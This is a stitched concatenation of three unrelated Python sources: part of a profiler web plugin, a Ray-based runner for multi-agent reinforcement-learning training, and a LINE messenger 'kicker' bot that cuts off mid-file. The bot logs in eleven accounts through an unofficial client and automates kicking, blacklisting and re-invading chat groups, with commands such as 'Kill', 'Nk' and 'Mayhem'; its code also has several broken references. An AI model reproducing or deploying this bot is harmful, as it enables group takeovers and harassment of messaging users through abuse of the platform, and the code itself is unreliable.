views = sorted(run.views, key=lambda x: x.id)
views_list = []
for view in views:
views_list.append(view.display_name)
return self.respond_as_json(views_list)
@wrappers.Request.application
def workers_route(self, request):
name = request.args.get("run")
run = self.get_run(name)
return self.respond_as_json(run.workers)
@wrappers.Request.application
def overview_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
run = self.get_run(name)
profile = run.get_profile(worker)
data = profile.overview
is_gpu_used = profile.has_runtime or profile.has_kernel or profile.has_memcpy_or_memset
data["environments"] = [{"title": "Number of Worker(s)", "value": str(len(run.workers))},
{"title": "Device Type", "value": "GPU" if is_gpu_used else "CPU"}]
return self.respond_as_json(data)
@wrappers.Request.application
def operation_pie_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
group_by = request.args.get("group_by")
run = self.get_run(name)
profile = run.get_profile(worker)
if group_by == "OperationAndInputShape":
return self.respond_as_json(profile.operation_pie_by_name_input)
else:
return self.respond_as_json(profile.operation_pie_by_name)
@wrappers.Request.application
def operation_table_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
group_by = request.args.get("group_by")
run = self.get_run(name)
profile = run.get_profile(worker)
if group_by == "OperationAndInputShape":
return self.respond_as_json(profile.operation_table_by_name_input)
else:
return self.respond_as_json(profile.operation_table_by_name)
@wrappers.Request.application
def kernel_pie_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
run = self.get_run(name)
profile = run.get_profile(worker)
return self.respond_as_json(profile.kernel_pie)
@wrappers.Request.application
def kernel_table_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
group_by = request.args.get("group_by")
run = self.get_run(name)
profile = run.get_profile(worker)
if group_by == "Kernel":
return self.respond_as_json(profile.kernel_table)
else:
return self.respond_as_json(profile.kernel_op_table)
@wrappers.Request.application
def trace_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
run = self.get_run(name)
profile = run.get_profile(worker)
fopen = open
with fopen(profile.trace_file_path, 'rb') as f:
raw_data = f.read()
if profile.trace_file_path.endswith('.gz'):
headers = []
headers.append(('Content-Encoding', 'gzip'))
return werkzeug.Response(raw_data, content_type="application/json", headers=headers)
else:
return werkzeug.Response(raw_data, content_type="application/json")
@wrappers.Request.application
def static_file_route(self, request):
filename = os.path.basename(request.path)
extension = os.path.splitext(filename)[1]
if extension == '.html':
mimetype = 'text/html'
elif extension == '.css':
mimetype = 'text/css'
elif extension == '.js':
mimetype = 'application/javascript'
else:
mimetype = 'application/octet-stream'
filepath = os.path.join(os.path.dirname(__file__), 'static', filename)
try:
with open(filepath, 'rb') as infile:
contents = infile.read()
except IOError:
return werkzeug.Response('404 Not Found', 'text/plain', code=404)
return werkzeug.Response(
contents, content_type=mimetype
)
@staticmethod
def respond_as_json(obj):
content = json.dumps(obj)
return werkzeug.Response(content, content_type="application/json")
def _load_run(queue, name, run_dir):
import absl.logging
absl.logging.use_absl_handler()
try:
logger.info("Load run %s", name)
# Currently, assume run data is immutable, so just load once
loader = RunLoader(name, run_dir)
run = loader.load()
logger.info("Run %s loaded", name)
queue.put(run)
except Exception as ex:
logger.warning("Failed to load run %s. Exception=%s", ex, name, exc_info=True)
|
Runner.py
|
import threading
import ray
from Ray_ACNet import ACNet
import GroupLock
from Primal2Env import Primal2Env
from Primal2Observer import Primal2Observer
from Map_Generator2 import maze_generator
from Worker import Worker
from parameters import *
import os
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
class Runner(object):
"""Actor object to start running simulation on workers.
Gradient computation is also executed on this object."""
def __init__(self, metaAgentID):
# tensorflow must be imported within the constructor
# because this class will be instantiated on a remote ray node
import tensorflow as tf
num_agents = NUM_THREADS
self.env = Primal2Env(num_agents=num_agents,
observer=Primal2Observer(observation_size=OBS_SIZE,
num_future_steps=NUM_FUTURE_STEPS),
map_generator=maze_generator(
env_size=ENVIRONMENT_SIZE,
wall_components=WALL_COMPONENTS,
obstacle_density=OBSTACLE_DENSITY),
IsDiagonal=DIAG_MVMT,
isOneShot=True)
self.metaAgentID = metaAgentID
trainer = None
self.localNetwork = ACNet(LOCAL_NET_SCOPE,a_size,trainer,True,NUM_CHANNEL,OBS_SIZE,GLOBAL_NET_SCOPE=GLOBAL_NET_SCOPE, GLOBAL_NETWORK=False)
self.currEpisode = int(metaAgentID)
self.global_step = tf.placeholder(tf.float32)
# first `NUM_IL_META_AGENTS` only use IL and don't need gpu/tensorflow
if self.metaAgentID < NUM_IL_META_AGENTS:
config = tf.ConfigProto(allow_soft_placement=True, device_count={"GPU": 0})
self.coord = None
self.saver = None
else:
# set up tf session
config = tf.ConfigProto(allow_soft_placement = True)
config.gpu_options.per_process_gpu_memory_fraction = 4.0 / (NUM_META_AGENTS - NUM_IL_META_AGENTS + 1)
config.gpu_options.allow_growth=True
self.saver = tf.train.Saver(max_to_keep=1)
self.coord = tf.train.Coordinator()
self.sess = tf.Session(config=config)
self.sess.run(tf.global_variables_initializer())
self.weightVars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
weights = self.sess.run(self.weightVars)
self.weightSetters = [tf.placeholder(shape=w.shape, dtype=tf.float32) for w in weights]
self.set_weights_ops = [var.assign(w) for var, w in zip(self.weightVars, self.weightSetters)]
def __del__(self):
print('((Runner)__del__)meta:{}'.format(self.metaAgentID))
def set_weights(self, weights):
feed_dict = {
self.weightSetters[i]: w for i, w in enumerate(weights)
}
self.sess.run([self.set_weights_ops], feed_dict=feed_dict)
def multiThreadedJob(self, episodeNumber):
workers = []
worker_threads = []
workerNames = ["worker_" + str(i+1) for i in range(NUM_THREADS)]
groupLock = GroupLock.GroupLock([workerNames, workerNames]) # TODO
workersPerMetaAgent = NUM_THREADS
for a in range(NUM_THREADS):
agentID = a + 1
workers.append(Worker(self.metaAgentID, agentID, workersPerMetaAgent,
self.env, self.localNetwork,
self.sess, groupLock, learningAgent=True, global_step=self.global_step))
for w in workers:
groupLock.acquire(0, w.name)
worker_work = lambda: w.work(episodeNumber, self.coord, self.saver, self.weightVars)
t = threading.Thread(target=(worker_work))
t.start()
worker_threads.append(t)
self.coord.join(worker_threads)
jobResults = []
loss_metrics = []
perf_metrics = []
is_imitation = None
for w in workers:
if w.learningAgent:
if JOB_TYPE == JOB_OPTIONS.getGradient:
jobResults = jobResults + w.allGradients
elif JOB_TYPE == JOB_OPTIONS.getExperience:
jobResults.append(w.experienceBuffer)
is_imitation = False # w.is_imitation
loss_metrics.append(w.loss_metrics)
perf_metrics.append(w.perf_metrics)
avg_loss_metrics = list(np.mean(np.array(loss_metrics), axis=0))
if not is_imitation:
# perf_metrics structure:
#
# w.perf_metrics = [
# episode_step_count,
# episode_values,
# episode_inv_count,
# episode_stop_count,
# episode_reward,
# targets_done
# ]
perf_metrics = np.array(perf_metrics)
avg_perf_metrics = np.mean(perf_metrics[:, :4], axis=0)
episode_reward = np.sum(perf_metrics[:,4])
targets_done = np.sum(perf_metrics[:, 5])
avg_perf_metrics = list(avg_perf_metrics) + [episode_reward, targets_done]
all_metrics = avg_loss_metrics + avg_perf_metrics
else:
all_metrics = avg_loss_metrics
return jobResults, all_metrics, is_imitation
def imitationLearningJob(self, episodeNumber):
workersPerMetaAgent = NUM_THREADS
agentID=None
groupLock = None
worker = Worker(self.metaAgentID, agentID, workersPerMetaAgent,
self.env, self.localNetwork,
self.sess, None, learningAgent=True, global_step=self.global_step)
gradients, losses = worker.imitation_learning_only(episodeNumber)
mean_imitation_loss = [np.mean(losses)]
is_imitation = True
return gradients, mean_imitation_loss, is_imitation
def job(self, global_weights, episodeNumber):
print("(Runner)metaAgent {0} starting episode {1}".format(self.metaAgentID, episodeNumber))
# set the local weights to the global weight values from the master network
self.set_weights(global_weights)
# set first `NUM_IL_META_AGENTS` to perform imitation learning
if self.metaAgentID < NUM_IL_META_AGENTS:
jobResults, metrics, is_imitation = self.imitationLearningJob(episodeNumber)
elif COMPUTE_TYPE == COMPUTE_OPTIONS.multiThreaded:
jobResults, metrics, is_imitation = self.multiThreadedJob(episodeNumber)
elif COMPUTE_TYPE == COMPUTE_OPTIONS.synchronous:
print("not implemented")
assert(1==0)
# Get the job results from the learning agents
# and send them back to the master network
info = {
"id": self.metaAgentID,
"episode_number": episodeNumber,
"is_imitation": is_imitation
}
return jobResults, metrics, info
@ray.remote(num_cpus=2, num_gpus=4.0 / (NUM_META_AGENTS - NUM_IL_META_AGENTS + 1))
class RLRunner(Runner):
def __init__(self, metaAgentID):
super().__init__(metaAgentID)
@ray.remote(num_cpus=1, num_gpus=0)
class imitationRunner(Runner):
def __init__(self, metaAgentID):
super().__init__(metaAgentID)
if __name__ == '__main__':
pass
|
self.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time,random,sys,json,codecs,threading,glob,re
cl = LINETCR.LINE()
cl.login(qr=True)
cl.loginResult()
ki = LINETCR.LINE()
ki.login(qr=True)
ki.loginResult()
ki2 = LINETCR.LINE()
ki2.login(qr=True)
ki2.loginResult()
ki3 = LINETCR.LINE()
ki3.login(qr=True)
ki3.loginResult()
ki4 = LINETCR.LINE()
ki4.login(qr=True)
ki4.loginResult()
ki5 = LINETCR.LINE()
ki5.login(qr=True)
ki5.loginResult()
ki6 = LINETCR.LINE()
ki6.login(qr=True)
ki6.loginResult()
ki7 = LINETCR.LINE()
ki7.login(qr=True)
ki7.loginResult()
ki8 = LINETCR.LINE()
ki8.login(qr=True)
ki8.loginResult()
ki9 = LINETCR.LINE()
ki9.login(qr=True)
ki9.loginResult()
ki10 = LINETCR.LINE()
ki10.login(qr=True)
ki10.loginResult()
print "Iphenk login success"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage =""" **IP chatBot Help Menu**
↠Public Command↞
√ [Bot]- -Show Contact All Bot
√ [Group id]- -Show Group ID
√ [Ginfo]- -Show Group Info
√ [Mid all]- -Show all the Bot(s) MID
√ [Respon]- -Check Response Bot
√ [Speed]- -Check Kecepatan Bot
√ [Banlist]- -Check Banned Contact
√ [Gn G.Name]- -Change Group Name
√ [Cancel]- -Cancel Group Invitation
√ [Tag All]- -Tag All Member
√ [View]- -View Setting
√ [Open]- -Open Url
√ [Close]- -Close Url
√ [Stafflist]
√ [Set]
↠KICKER↞
**Protect / Damage Your Group**
√ [Banned @] Bann Target
√ [Unban @] Unbann Target
√ [Kill @] Kick Target Bann
√ [Nk @] Kick Target User
√ [All] Invite Semua Bot
√ [Mayhem] Do not use in d'group
「 Edited By 」
http://line.me/ti/p/zuFNPuXyEb
"""
Setgroup =""" **Bot Protection Key**
√ [AllProtection]~[AllProtection on / off]
√ [Protect QR]~[Qr on / off]
√ [Mid Check]~[Contact On / Off]
√ [Reject Invite]~[Guest On / Off]
√ [Protect Cancel]~[Proc on / off]
√ [Member Protect]~[MProtection on / off]
"""
KAC=[cl,ki,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = ki2.getProfile().mid
Cmid = ki3.getProfile().mid
Dmid = ki4.getProfile().mid
Emid = ki5.getProfile().mid
Fmid = ki6.getProfile().mid
Gmid = ki7.getProfile().mid
Hmid = ki8.getProfile().mid
Imid = ki9.getProfile().mid
Jmid = ki10.getProfile().mid
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid,"u9e5a757e7b6e466baf87e8f747d96eb5","ud4f80e5acbc5b7d325284692a9900941"]
admin = ["u9e5a757e7b6e466baf87e8f747d96eb5","ud4f80e5acbc5b7d325284692a9900941"]
staff = ["u9e5a757e7b6e466baf87e8f747d96eb5"]
adminMID = "u9e5a757e7b6e466baf87e8f747d96eb5","ud4f80e5acbc5b7d325284692a9900941"
wait = {
'contact':True,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"Thanks for add me",
"lang":"JP",
"comment":"Thanks for add me",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"IP ディータ",
"cName2":"ディータ1つ " ,
"cName3":"ディータ二人 ",
"cName4":"ディータ三 ",
"cName5":"ディータ4人 ",
"cName6":"ディータ五 ",
"cName7":"ディータ6 ",
"cName8":"ディータ7人 ",
"cName9":"ディータ8人 ",
"cName10":"ディータ9人 ",
"cName11":"ディータ10人 ",
"blacklist":{},
"wblacklist":False,
"dblacklist":True,
"ProtectQR":False,
"Protectguest":False,
"Protectcancel":False,
"protectionOn":True,
"atjointicket":True,
"MProtection":False,
"AllProtection":False
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
setTime = {}
setTime = wait2['setTime']
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
pass
except:
pass
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#-------Protect Qr-------#
if op.type == 11:
if wait["ProtectQR"] == True:
if op.param2 not in Bots or staff:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
ki.kickoutFromGroup(op.param1,[op.param2])
cl.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
#------Finish------#
# -INV KICK- #
if op.type == 13:
if wait["Protectguest"] == True:
if op.param2 in Bots or staff:
pass
else:
random.choice(KAC).cancelGroupInvitation(op.param1,[op.param3])
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
#------FINISH------#
#--CANCEL KICK--#
if op.type == 32:
if wait["Protectcancel"] == True:
if op.param2 not in Bots or staff:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
#------FINISH------#
if op.type == 15:
random.choice(KAC).sendText(op.param1, cl.getContact(op.param2).displayName + " Good Bye\n(*´・ω・*)")
print op.param3 + "has left the group"
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = Amid.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = False
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = False
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
X = ki4.getGroup(op.param1)
X.preventJoinByTicket = False
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
X = ki5.getGroup(op.param1)
X.preventJoinByTicket = False
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
if op.param3 in Emid:
if op.param2 in Fmid:
X = ki6.getGroup(op.param1)
X.preventJoinByTicket = False
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
if op.param3 in Fmid:
if op.param2 in Gmid:
X = ki7.getGroup(op.param1)
X.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
if op.param3 in Gmid:
if op.param2 in Hmid:
X = ki8.getGroup(op.param1)
X.preventJoinByTicket = False
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
if op.param3 in Hmid:
if op.param2 in Imid:
X = ki9.getGroup(op.param1)
X.preventJoinByTicket = False
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki8.updateGroup(X)
Ti = k8.reissueGroupTicket(op.param1)
if op.param3 in Imid:
if op.param2 in Jmid:
X = ki10.getGroup(op.param1)
X.preventJoinByTicket = False
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
if op.param3 in Jmid:
if op.param2 in mid:
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
if op.type == 13:
print op.param1
print op.param2
print op.param3
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.knviteIntoGroup(op.param1,[op.param3])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = True
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = True
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = True
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = True
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Fmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki6.getGroup(op.param1)
